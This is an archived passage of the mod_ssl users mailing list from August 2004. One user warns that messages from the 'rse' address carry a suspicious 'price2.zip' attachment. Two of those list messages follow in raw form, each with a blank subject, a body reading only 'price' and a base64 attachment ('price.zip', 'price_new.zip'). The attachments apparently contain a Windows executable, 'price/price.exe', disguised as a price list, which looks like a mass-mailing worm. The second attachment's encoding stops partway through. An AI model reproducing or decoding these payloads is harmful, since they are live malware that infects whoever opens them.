Modssl list owner and rse@engelschall.com:

Please check rse@engelschall.com - I have received several dozen e-mail's
via the list from this address - each has a "price2.zip" file attached and
the body says "new price" - I believe this person's computer has a virus and
they don't know it.

Thanks,


Don Woodward




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 21:03:03 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B609CA8D0E; Mon,  9 Aug 2004 21:03:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from CFE030000.com (fw.si-intl.com [65.195.121.66])
	by master.modssl.org (Postfix) with SMTP id 4BD0FA8CEA
	for ; Mon,  9 Aug 2004 21:02:57 +0200 (CEST)
Date: Mon, 09 Aug 2004 15:02:07 -0500
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------oxjivyyhbmtfxovtoabj"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------oxjivyyhbmtfxovtoabj
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


 price







----------oxjivyyhbmtfxovtoabj
Content-Type: application/octet-stream; name="price.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="price.zip"

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

----------oxjivyyhbmtfxovtoabj--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 21:07:39 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 12949A8D09; Mon,  9 Aug 2004 21:07:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from PWALDRON.com (host57.155.212.194.conversent.net [155.212.194.57])
	by master.modssl.org (Postfix) with SMTP id 71164A8D0C
	for ; Mon,  9 Aug 2004 21:07:34 +0200 (CEST)
Date: Mon, 09 Aug 2004 15:08:25 -0500
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------ygptoosnzeesfaiucysi"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------ygptoosnzeesfaiucysi
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


  price







----------ygptoosnzeesfaiucysi
Content-Type: application/octet-stream; name="price_new.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="price_new.zip"

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
